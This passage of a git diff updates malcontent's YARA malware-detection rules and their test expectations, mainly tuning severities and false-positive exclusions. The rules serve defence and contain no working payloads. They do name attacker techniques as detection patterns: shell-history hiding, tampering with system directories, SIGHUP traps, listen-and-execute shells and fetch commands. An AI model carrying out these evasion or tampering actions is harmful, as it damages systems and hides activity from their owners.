"e2125d9ce884c0fb3674bd12308ed1c10651dc4ff917b5e393d7c56d7b809b87" - hash_2023_Qubitstrike_branch_raw_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd" - - strings: - $in_usr = /(mv|chattr|rm|touch) \/(bin|root|sbin|usr|var|lib|lib64|boot)\/[ \.\w\/]{0,64}/ - $not_mdm = "/var/db/MDM_EnableManagedApps" - - condition: - $in_usr and none of ($not*) -} diff --git a/rules/evasion/file/location/system_directory.yara b/rules/evasion/file/location/system_directory.yara index f6e2c454a..9f2bd2899 100644 --- a/rules/evasion/file/location/system_directory.yara +++ b/rules/evasion/file/location/system_directory.yara @@ -9,3 +9,18 @@ rule cp_to_apple_directory: high { condition: any of them } + +rule system_fs_manipulator: medium { + meta: + description = "Modifies files within system directories" + hash_2023_Linux_Malware_Samples_3059 = "305901aa920493695729132cfd20cbddc9db2cf861071450a646c6a07b4a50f3" + hash_2023_Linux_Malware_Samples_e212 = "e2125d9ce884c0fb3674bd12308ed1c10651dc4ff917b5e393d7c56d7b809b87" + hash_2023_Qubitstrike_branch_raw_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd" + + strings: + $in_usr = /(mv|chattr|rm|touch) \/(bin|root|sbin|usr|var|lib|lib64|boot)\/[ \.\w\/]{0,64}/ + $not_mdm = "/var/db/MDM_EnableManagedApps" + + condition: + $in_usr and none of ($not*) +} diff --git a/rules/evasion/file/location/tmp_x11-unix.yara b/rules/evasion/file/location/x11-unix.yara similarity index 80% rename from rules/evasion/file/location/tmp_x11-unix.yara rename to rules/evasion/file/location/x11-unix.yara index 5ecf54dc8..dd36e841f 100644 --- a/rules/evasion/file/location/tmp_x11-unix.yara +++ b/rules/evasion/file/location/x11-unix.yara @@ -1,6 +1,6 @@ rule hidden_x11: high { meta: - description = "may store content in /tmp/.X11-unix" + description = "references content in /tmp/.X11-unix" ref = "https://www.welivesecurity.com/2021/10/07/fontonlake-previously-unknown-malware-family-targeting-linux/" strings: @@ -18,9 +18,9 @@ rule X11: override { $usr_share = "/usr/share/X11" $X11Gray = "X11Gray" $X11_space = "/etc/X11/" - $X11R6 = "X11R6" + $X11R6 = "X11R6/share" $XForwarding = "X11 forwarding" - + $X = "/tmp/.X11-unix/X" fullword condition: filesize < 10MB and any of them } diff --git a/rules/evasion/file/prefix/lib.yara b/rules/evasion/file/prefix/lib.yara index 39eb2a2dd..ebcb8ef4b 100644 --- a/rules/evasion/file/prefix/lib.yara +++ b/rules/evasion/file/prefix/lib.yara @@ -3,7 +3,7 @@ rule lib_subdir: high linux { description = "hides paths within a /lib subdirectory" strings: - $ref = /\/lib\/[\w\.]{0,16}\/\.[\.\w\-\%\@]{0,16}/ fullword + $ref = /\/lib\/[\w\.]{1,16}\/\.[\w\-\%\@]{1,16}/ fullword condition: any of them diff --git a/rules/evasion/file/prefix/prefix.yara b/rules/evasion/file/prefix/prefix.yara index e5160b02a..c16702d5a 100644 --- a/rules/evasion/file/prefix/prefix.yara +++ b/rules/evasion/file/prefix/prefix.yara @@ -46,7 +46,9 @@ rule hidden_short_path: high { $not_network_manager = "org.freedesktop.NetworkManager" $not_private = "/System/Library/PrivateFrameworks/" $not_X11 = "/tmp/.X11-unix" + $not_XIM = "/tmp/.XIM-unix" $not_cpp = "/tmp/.cpp.err" + $not_pwd = "/etc/.pwd.lock" condition: $crit and none of ($not*) diff --git a/rules/evasion/hijack_execution/etc-ld.so.preload.yara b/rules/evasion/hijack_execution/etc-ld.so.preload.yara index edb763205..7f4ffe56a 100644 --- a/rules/evasion/hijack_execution/etc-ld.so.preload.yara +++ b/rules/evasion/hijack_execution/etc-ld.so.preload.yara @@ -25,7 +25,7 @@ rule etc_ld_preload_not_ld: high linux { $not_env_hwcap = "LD_HWCAP_MASK" $not_env_audit = "LD_AUDIT" $not_cache = "ld.so.cache" - + $not_man = "MAN_DISABLE_SECCOMP" condition: $ref and none of ($not*) } diff --git a/rules/evasion/logging/hide_shell_history.yara b/rules/evasion/logging/hide_shell_history.yara index e29b4c4c1..d6dc08874 100644 --- a/rules/evasion/logging/hide_shell_history.yara +++ b/rules/evasion/logging/hide_shell_history.yara @@ -13,7 +13,6 @@ rule hide_shell_history: high { $h_shopt_history = "shopt -ou history" $h_set_o_history = "set +o history" $histsize_0 = "HISTSIZE=0" - $h_gotcha = "GOTCHA" $not_increment = "HISTSIZE++" condition: diff --git a/rules/evasion/logging/historical_logins.yara b/rules/evasion/logging/historical_logins.yara index 744adf978..8f348a1a4 100644 --- a/rules/evasion/logging/historical_logins.yara +++ b/rules/evasion/logging/historical_logins.yara @@ -1,4 +1,4 @@ -rule login_records: high { +rule login_records: medium { meta: description = "accesses historical login records" hash_2023_FontOnLake_45E94ABEDAD8C0044A43FF6D72A5C44C6ABD9378_elf = "f60c1214b5091e6e4e5e7db0c16bf18a062d096c6d69fe1eb3cbd4c50c3a3ed6" diff --git a/rules/evasion/mimicry/fake-library.yara b/rules/evasion/mimicry/fake-library.yara index ca943c51f..3da69deac 100644 --- a/rules/evasion/mimicry/fake-library.yara +++ b/rules/evasion/mimicry/fake-library.yara @@ -33,9 +33,9 @@ rule libc_fake_number_val: high { hash_2023_uacert_refs = "106eef08f3bfcced3e221ee6f789792650386d7794d30c80eae19e42ef893682" strings: - $fake_libc_version = /libc.so.[2345789]/ - + $ref = /libc.so.[2345789]/ + $not_go_example = "libc.so.96.1" condition: - any of them + $ref and none of ($not*) } diff --git a/rules/evasion/net/http_443.yara b/rules/evasion/net/http_443.yara index fc0f2daf4..a874c3047 100644 --- a/rules/evasion/net/http_443.yara +++ b/rules/evasion/net/http_443.yara @@ -7,7 +7,7 @@ rule http_port_443: high { $not_test = "assertEqual" $not_example = "http://example.com:443" $not_localhost = "http://localhost:443" - + $not_foo = "http://foo.com:443/" condition: $http_443 and none of ($not*) } diff --git a/rules/evasion/rootkit/linux_kernel.yara b/rules/evasion/rootkit/linux_kernel.yara index 5714bba81..d870340b9 100644 --- a/rules/evasion/rootkit/linux_kernel.yara +++ b/rules/evasion/rootkit/linux_kernel.yara @@ -41,7 +41,7 @@ rule lkm_dirent: high { $linux = "Linux" $not_syscalls = "#define _LINUX_SYSCALLS_H" $not_itimer = "__kernel_old_itimerval" - + $not_internal = "internal_getdents" condition: filesize < 2MB and all of ($l*) and none of ($not*) } diff --git a/rules/exec/shell/nohup.yara b/rules/exec/shell/nohup.yara index b42dc1a00..a11f35f9c 100644 --- a/rules/exec/shell/nohup.yara +++ b/rules/exec/shell/nohup.yara @@ -36,21 +36,6 @@ rule elf_nohup: high { uint32(0) == 1179403647 and filesize < 1MB and any of ($nohup*) and none of ($not*) } -rule trap_1: high { - meta: - description = "Protects itself from early termination via SIGHUP" - hash_2023_Linux_Malware_Samples_3059 = "305901aa920493695729132cfd20cbddc9db2cf861071450a646c6a07b4a50f3" - hash_2023_Linux_Malware_Samples_553a = "553ac527d6a02a84c787fd529ea59ce1eb301ddfb180d89b9e62108d92894185" - hash_2023_Linux_Malware_Samples_7a60 = "7a60c84fb34b2b3cd7eed3ecd6e4a0414f92136af656ed7d4460b8694f2357a7" - - strings: - $ref = "trap '' 1" - $ref2 = "trap \"\" 1" - - condition: - any of them -} - rule nohup_bash: high { meta: description = "Calls bash with nohup" diff --git a/rules/exec/shell/sighup_trap.yara b/rules/exec/shell/sighup_trap.yara new file mode 100644 index 000000000..c2cc81895 --- /dev/null +++ b/rules/exec/shell/sighup_trap.yara @@ -0,0 +1,14 @@ +rule trap_1: high { + meta: + description = "Protects itself from early termination via SIGHUP" + hash_2023_Linux_Malware_Samples_3059 = "305901aa920493695729132cfd20cbddc9db2cf861071450a646c6a07b4a50f3" + hash_2023_Linux_Malware_Samples_553a = "553ac527d6a02a84c787fd529ea59ce1eb301ddfb180d89b9e62108d92894185" + hash_2023_Linux_Malware_Samples_7a60 = "7a60c84fb34b2b3cd7eed3ecd6e4a0414f92136af656ed7d4460b8694f2357a7" + + strings: + $ref = "trap '' 1" + $ref2 = "trap \"\" 1" + $not_netcat_example = "ignore most signals; the parent will nuke the kid" + condition: + any of ($ref*) and none of ($not*) +} \ No newline at end of file diff --git a/rules/false_positives/libdw.yara b/rules/false_positives/libdw.yara new file mode 100644 index 000000000..36b0ac115 --- /dev/null +++ b/rules/false_positives/libdw.yara @@ -0,0 +1,10 @@ +rule libdw_override: override { + meta: + description = "libdw.so" + ptrace_injector = "medium" + strings: + $dward = "invalid DWARF" + + condition: + filesize < 2MB and any of them +} diff --git a/rules/false_positives/linux_src.yara b/rules/false_positives/linux_src.yara index 6bc14ce4c..e922ad6da 100644 --- a/rules/false_positives/linux_src.yara +++ b/rules/false_positives/linux_src.yara @@ -7,6 +7,7 @@ rule linux_test_script: override linux { hidden_short_path = "medium" kernel_module_loader = "medium" cd_root = "medium" + server_address = "medium" description = "Linux test script" strings: diff --git a/rules/false_positives/sudo.yara b/rules/false_positives/sudo.yara index bd3f714f8..f82b437a8 100644 --- a/rules/false_positives/sudo.yara +++ b/rules/false_positives/sudo.yara @@ -1,7 +1,7 @@ rule sudo: override linux { meta: description = "sudo" - proc_exe = "medium" + proc_c_exe = "medium" strings: $ref = "SUDO_INTERCEPT_FD" diff --git a/rules/false_positives/vmtools.yara b/rules/false_positives/vmtools.yara index bec7a593e..d9525168e 100644 --- a/rules/false_positives/vmtools.yara +++ b/rules/false_positives/vmtools.yara @@ -3,9 +3,11 @@ rule vmtools: override { description = "vmtools" backdoor = "medium" linux_critical_system_paths_high = "medium" - + proc_net_route_high = "medium" + proc_s_exe = "medium" + sys_net_recon_exfil = "medium" strings: - $vmtools = "VMTools_LoadConfig" fullword + $vmtools = "VMTools" fullword $vmsupport = "VMSUPPORT" fullword condition: diff --git a/rules/fs/permission/permission-modify-dangerous.yara b/rules/fs/permission/permission-modify-dangerous.yara index 8af721630..e13faf533 100644 --- a/rules/fs/permission/permission-modify-dangerous.yara +++ b/rules/fs/permission/permission-modify-dangerous.yara @@ -22,7 +22,7 @@ rule chmod_dangerous_exec: high exfil { $not_chmod_01777 = "chmod 01777" $not_chromium = "CHROMIUM_TIMESTAMP" $not_var_tmp = "chmod 0777 /var/tmp" fullword - + $not_extutils = "chmod 0777, [.foo.bar] doesn't work on VMS" condition: filesize < 50MB and $ref and none of ($not*) } diff --git a/rules/fs/proc/pid-exe.yara b/rules/fs/proc/pid-exe.yara index 44496b6ce..6403f307e 100644 --- a/rules/fs/proc/pid-exe.yara +++ b/rules/fs/proc/pid-exe.yara @@ -1,13 +1,31 @@ -rule proc_exe: high { +rule proc_s_exe: high { meta: - description = "accesses underlying executable of other processes" - hash_2023_OK_4f5c = "4f5cfb805feb7576e594f1bb3b773ba0ca80e09e49bfb7e3507f815f774ac62d" - hash_2023_Pupy_2ab5 = "2ab59fa690e502a733aa1500a96d8e94ecb892ed9d59736cca16a09538ce7d77" - hash_2023_Unix_Dropper_Mirai_58c5 = "58c54ded0af2fffb8cea743d8ec3538cecfe1afe88d5f7818591fb5d4d2bd4e1" + description = "accesses underlying executable of other processes" strings: $string = "/proc/%s/exe" fullword - $digit = "/proc/%d/exe" fullword + $not_tool = /[Uu]sage:/ fullword + condition: + $string and none of ($not*) +} + +rule proc_d_exe: medium { + meta: + description = "accesses underlying executable of other processes" + + strings: + $digit = "/proc/%d/exe" fullword + $not_cgroup = "cgroup" fullword + $not_tool = /[Uu]sage:/ fullword + condition: + $digit and none of ($not*) +} + +rule proc_py_exe: high { + meta: + description = "accesses underlying executable of other processes" + + strings: $python = "/proc/{}/exe" fullword condition: diff --git a/rules/hw/dev/sd_mmc.yara b/rules/hw/dev/sd_mmc.yara index 7ae5710b3..16e8e5017 100644 --- a/rules/hw/dev/sd_mmc.yara +++ b/rules/hw/dev/sd_mmc.yara @@ -4,9 +4,21 @@ rule dev_mmc: high { description = "access raw SD/MMC devices" strings: - $val = /\/dev\/mmcblk[\$%\w\{\}]{0,16}/ - $block_val = /\/dev\/block\/mmcblk[\$%\w\{\}]{0,16}/ + $dev_mmc = /\/dev\/mmcblk[\$%\w\{\}]{0,16}/ + $dev_block = /\/dev\/block\/mmcblk[\$%\w\{\}]{0,16}/ condition: - filesize < 10MB and any of them + filesize < 10MB and any of ($dev*) +} + +rule dev_mmc_ok: override { + meta: + dev_mmc = "medium" + + strings: + $not_fwupd = "fu_firmware_set_id" + $not_ipmi = "/dev/ipmi" + $not_grub = "GRUB" fullword + condition: + dev_mmc and any of them } diff --git a/rules/hw/dev/ubi.yara b/rules/hw/dev/ubi.yara index 5ee50137e..bf858ad27 100644 --- a/rules/hw/dev/ubi.yara +++ b/rules/hw/dev/ubi.yara @@ -9,3 +9,14 @@ rule ubi: high linux { condition: any of them } + +rule expected_ubi_users : override { + meta: + ubi = "medium" + strings: + $libuboot = "libuboot" + $usage = "Usage:" + $ubi = "ubifs" fullword + condition: + filesize < 120KB and any of them +} \ No newline at end of file diff --git a/rules/impact/degrade/firewall.yara b/rules/impact/degrade/firewall.yara index ed967cae9..929e2f263 100644 --- a/rules/impact/degrade/firewall.yara +++ b/rules/impact/degrade/firewall.yara @@ -18,7 +18,7 @@ rule selinux_firewall: high linux { $not_selinux_init = "SELINUX_INIT" $not_define = "#define" fullword $not_netlink = "NETLINK" fullword - + $not_containerd = "containerd" fullword condition: filesize < 1MB and $selinux and any of ($f*) and none of ($not*) } diff --git a/rules/impact/exploit/exploit.yara b/rules/impact/exploit/exploit.yara index fb1e92b08..593214103 100644 --- a/rules/impact/exploit/exploit.yara +++ b/rules/impact/exploit/exploit.yara @@ -24,6 +24,18 @@ rule exploitation: medium { any of ($ref*) and none of ($not*) and not legal_license } +rule Exploit: medium { + meta: + description = "References an exploit" + + strings: + $ref6 = "Exploit" fullword + $not_reduction = "Exploit reduction" + + condition: + any of ($ref*) and none of ($not*) and not legal_license +} + rule exploiter: high { meta: description = "References an exploit" @@ -36,7 +48,6 @@ rule exploiter: high { $ref3 = "sploit" fullword $ref4 = "spl0it" fullword $ref5 = "pop a shell" fullword - $ref6 = "Exploit" fullword $not_ms_example = "Drive-by Compromise" condition: diff --git a/rules/impact/remote_access/backdoor.yara b/rules/impact/remote_access/backdoor.yara index 35203ede1..04a8ea70d 100644 --- a/rules/impact/remote_access/backdoor.yara +++ b/rules/impact/remote_access/backdoor.yara @@ -20,8 +20,10 @@ rule backdoor: high { strings: $ref = /[a-zA-Z\-_ \']{0,16}[bB]ackdoor[a-zA-Z\-_ ]{0,16}/ fullword + $not_vcpu = "VCPUInfoBackdoor" + $not_vmware = "gGuestBackdoorOps" condition: - filesize < 40MB and any of them and not wordlist + filesize < 40MB and any of them and not wordlist and none of ($not*) } rule backdoor_caps: high { diff --git a/rules/impact/remote_access/listen_shell.yara b/rules/impact/remote_access/listen_shell.yara index 3c5c11ec9..33d14bb3b 100644 --- a/rules/impact/remote_access/listen_shell.yara +++ b/rules/impact/remote_access/listen_shell.yara @@ -1,4 +1,4 @@ -rule listens_and_executes_shell: high { +rule listens_and_executes_shell: medium { meta: description = "Listens at a port and executes shells" hash_2024_Downloads_8cad = "8cad755bcf420135c0f406fb92138dcb0c1602bf72c15ed725bd3b76062dafe5" @@ -22,9 +22,12 @@ rule listens_and_executes_shell: high { $sh_cmd = "cmd.exe" $not_setlocale = "setlocale" fullword $not_ptrace = "ptrace" fullword + $not_image_jpeg = "image/jpeg" + $not_openpgp = "openpgp" + $not_dbus = "dbus" fullword condition: - filesize < 10MB and any of ($f_sock*) and any of ($f_exec*) and any of ($f_inet*) and any of ($f_listen*) and any of ($sh*) and none of ($not*) + filesize < 3MB and any of ($f_sock*) and any of ($f_exec*) and any of ($f_inet*) and any of ($f_listen*) and any of ($sh*) and none of ($not*) } rule go_tcp_listen_and_exec_shell: high { diff --git a/rules/impact/remote_access/net_term.yara b/rules/impact/remote_access/net_term.yara index 46253ad95..53b6119d2 100644 --- a/rules/impact/remote_access/net_term.yara +++ b/rules/impact/remote_access/net_term.yara @@ -84,16 +84,17 @@ rule miner_kvryr_stak_alike: high { hash_2023_Linux_Malware_Samples_39c3 = "39c33c261899f2cb91f686aa6da234175237cd72cfcd9291a6e51cbdc86d4def" strings: - $upload = "upload" - $shell = "shell" fullword - $bin_sh = "/bin/" - $tcsetattr = "tcsetattr" - $termios = "termios" fullword - $execve = "execve" - $numa = "NUMA" - + $f_upload = "upload" + $f_shell = "shell" fullword + $f_bin_sh = "/bin/" + $f_tcsetattr = "tcsetattr" + $f_termios = "termios" fullword + $f_execve = "execve" + $f_numa = "NUMA" + + $not_perf = "PERF_RECORD" condition: - filesize < 12MB and all of them + filesize < 12MB and all of ($f*) and none of ($not*) } rule proxy_http_aes_terminal_combo: medium { diff --git a/rules/lateral/scan/scan_tool.yara b/rules/lateral/scan/scan_tool.yara index 71e3b684a..2a62612a9 100644 --- a/rules/lateral/scan/scan_tool.yara +++ b/rules/lateral/scan/scan_tool.yara @@ -6,22 +6,24 @@ rule generic_scan_tool: medium { hash_2023_Linux_Malware_Samples_00ae = "00ae07c9fe63b080181b8a6d59c6b3b6f9913938858829e5a42ab90fb72edf7a" strings: - // $f_gethostbyname = "gethostbyname" - $f_socket = "socket" - $f_connect = "connect" + $f_gethostbyname = "gethostbyname" + $f_ip = "%d.%d.%d.%d" fullword + $f_socket = "socket" fullword + $f_connect = "connect" fullword $o_banner = "banner" $o_Probe = "Probe" $o_probe = "probe" $o_scan = "scan" $o_port = "port" $o_target = "target" - $o_ip = "%d.%d.%d.%d" + $o_Port = "Port" + $o_Target = "Target" $not_nss = "NSS_USE_SHEXP_IN_CERT_NAME" $not_microsoft = "Microsoft Corporation" $not_php_reference = "ftp_nb_put" condition: - all of ($f*) and 2 of ($o*) and none of ($not*) + 3 of ($f*) and 2 of ($o*) and none of ($not*) } rule root_scan_tool: high { diff --git a/rules/net/download/fetch.yara b/rules/net/download/fetch.yara index 9850a4323..fe132d1d4 100644 --- a/rules/net/download/fetch.yara +++ b/rules/net/download/fetch.yara @@ -138,6 +138,7 @@ rule high_fetch_command_val: high { $not_s_key = "curl -s --key" $not_local = "curl -ks https://localhost" $not_continue = "--continue-at" + $not_pciid = "https://pci-ids.ucw.cz" $x_chmod = "chmod" fullword $x_Chmod = "Chmod" fullword diff --git a/rules/persist/kernel_module/symbol-lookup.yara b/rules/persist/kernel_module/symbol-lookup.yara index bfdbd8034..c5e81ba18 100644 --- a/rules/persist/kernel_module/symbol-lookup.yara +++ b/rules/persist/kernel_module/symbol-lookup.yara @@ -40,3 +40,17 @@ rule bpftrace: override linux { condition: filesize < 2MB and any of them } + +rule bpf: override linux { + meta: + description = "libbpf" + filetypes = "so,elf" + kallsyms_lookup = "medium" + + strings: + $ref = "BPF" fullword + $ref2 = "LIBBPF" fullword + + condition: + filesize < 2MB and any of them +} diff --git a/rules/process/thread_local_storage.yara b/rules/process/thread_local_storage.yara deleted file mode 100644 index 68f190e9e..000000000 --- a/rules/process/thread_local_storage.yara +++ /dev/null @@ -1,11 +0,0 @@ -rule tls_get_addr: medium { - meta: - description = "looks up memory addresses for thread local storage or linked libraries" - ref = "https://chao-tic.github.io/blog/2018/12/25/tls" - - strings: - $val = "__tls_get_addr" fullword - - condition: - any of them -} diff --git a/tests/does-nothing/does-nothing.simple b/tests/does-nothing/does-nothing.simple index 37c6379a5..af4355d54 100644 --- a/tests/does-nothing/does-nothing.simple +++ b/tests/does-nothing/does-nothing.simple @@ -13,7 +13,6 @@ fs/path/etc: low fs/path/home: medium fs/permission/chown: medium fs/permission/modify: medium -lateral/scan/tool: medium net/socket/receive: low net/socket/send: low persist/daemon: medium diff --git a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff index 35179e6ff..50a5439c3 100644 --- a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff +++ b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff @@ -1,6 +1,6 @@ ## Changed: javascript/2024.lottie-player/lottie-player.min.js [🟡 MEDIUM → 😈 CRITICAL] -### 40 new behaviors +### 39 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | |-----------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| @@ -21,7 +21,6 @@ | +MEDIUM | **[impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent)** | references an 'agent' | [useragent](https://github.com/search?q=useragent&type=code) | | +MEDIUM | **[impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat)** | references a 'heartbeat' | [heartBeatTimeout](https://github.com/search?q=heartBeatTimeout&type=code)
[heartbeat_pulse](https://github.com/search?q=heartbeat_pulse&type=code)
[lastHeartbeatResponse](https://github.com/search?q=lastHeartbeatResponse&type=code)
[updateLastHeartbeat](https://github.com/search?q=updateLastHeartbeat&type=code) | | +MEDIUM | **[impact/resource/bank_xfer](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/resource/bank_xfer.yara#bank_xfer)** | references 'bank transfer' | [bank transfer](https://github.com/search?q=bank+transfer&type=code) | -| +MEDIUM | **[lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool)** | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | +MEDIUM | **[net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload)** | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code) | | +MEDIUM | **[net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post)** | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | +MEDIUM | **[net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket)** | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WalletLinkWebSocket](https://github.com/search?q=WalletLinkWebSocket&type=code)
[WebSocket:gV](https://github.com/search?q=WebSocket%3AgV&type=code)
[WebSocket:typeof](https://github.com/search?q=WebSocket%3Atypeof&type=code)
[WebSocketClass:h](https://github.com/search?q=WebSocketClass%3Ah&type=code)
[WebSocketClass:l](https://github.com/search?q=WebSocketClass%3Al&type=code)
[clearWebSocket](https://github.com/search?q=clearWebSocket&type=code)
[webSocket:e](https://github.com/search?q=webSocket%3Ae&type=code)
[webSocket:r](https://github.com/search?q=webSocket%3Ar&type=code)
[webSocket:t](https://github.com/search?q=webSocket%3At&type=code) | diff --git a/tests/javascript/clean/203.b7219352.chunk.js.simple b/tests/javascript/clean/203.b7219352.chunk.js.simple index a306dedb0..0e5568b9b 100644 --- a/tests/javascript/clean/203.b7219352.chunk.js.simple +++ b/tests/javascript/clean/203.b7219352.chunk.js.simple @@ -36,7 +36,6 @@ hw/wireless: low impact/degrade/infection: medium impact/remote_access/agent: medium impact/remote_access/heartbeat: medium -lateral/scan/tool: medium net/dns/txt: low net/download: medium net/http/cookies: medium diff --git a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple index f68825144..d973aaddd 100644 --- a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple +++ b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple @@ -21,6 +21,8 @@ data/encoding/json_encode: low data/encoding/reverse: low data/random/insecure: low discover/group/lookup: medium +discover/process/effective_groupid_get: medium +discover/process/parent_pid_get: low discover/processes/list: medium discover/system/hostname_get: low discover/system/platform: low @@ -91,9 +93,7 @@ persist/daemon: medium process/chdir: low process/chroot: low process/create: low -process/effective_groupid_get: medium process/groupid_set: low -process/parent_pid_get: low process/userid_set: low sus/exclamation: medium sus/intercept: medium diff --git a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple index 842e48d3e..fd567afc4 100644 --- a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple +++ b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple @@ -22,6 +22,8 @@ data/encoding/reverse: low data/hash/md5: low data/random/insecure: low discover/group/lookup: medium +discover/process/effective_groupid_get: medium +discover/process/parent_pid_get: low discover/processes/list: medium discover/system/hostname_get: low discover/system/platform: low @@ -91,9 +93,7 @@ persist/daemon: medium process/chdir: low process/chroot: low process/create: low -process/effective_groupid_get: medium process/groupid_set: low -process/parent_pid_get: low process/userid_set: low sus/exclamation: medium sus/intercept: medium diff --git a/tests/javascript/clean/connection.js.simple b/tests/javascript/clean/connection.js.simple index 76dcc4f27..04a5d5256 100644 --- a/tests/javascript/clean/connection.js.simple +++ b/tests/javascript/clean/connection.js.simple @@ -6,7 +6,6 @@ credential/password: low data/embedded/base64_terms: medium data/embedded/base64_url: medium data/encoding/base64: low -lateral/scan/tool: medium net/dns: low net/socket/send: low net/url/embedded: medium diff --git a/tests/javascript/clean/faker.js.simple b/tests/javascript/clean/faker.js.simple index a5474ab76..8bd713980 100644 --- a/tests/javascript/clean/faker.js.simple +++ b/tests/javascript/clean/faker.js.simple @@ -14,7 +14,6 @@ data/embedded/base64_url: medium data/encoding/base64: low data/encoding/json_decode: low data/encoding/json_encode: low -evasion/file/location/tmp_x11_unix: low exec/plugin: low exfil/office_file_ext: medium exfil/stealer/credit_card: medium @@ -26,7 +25,6 @@ 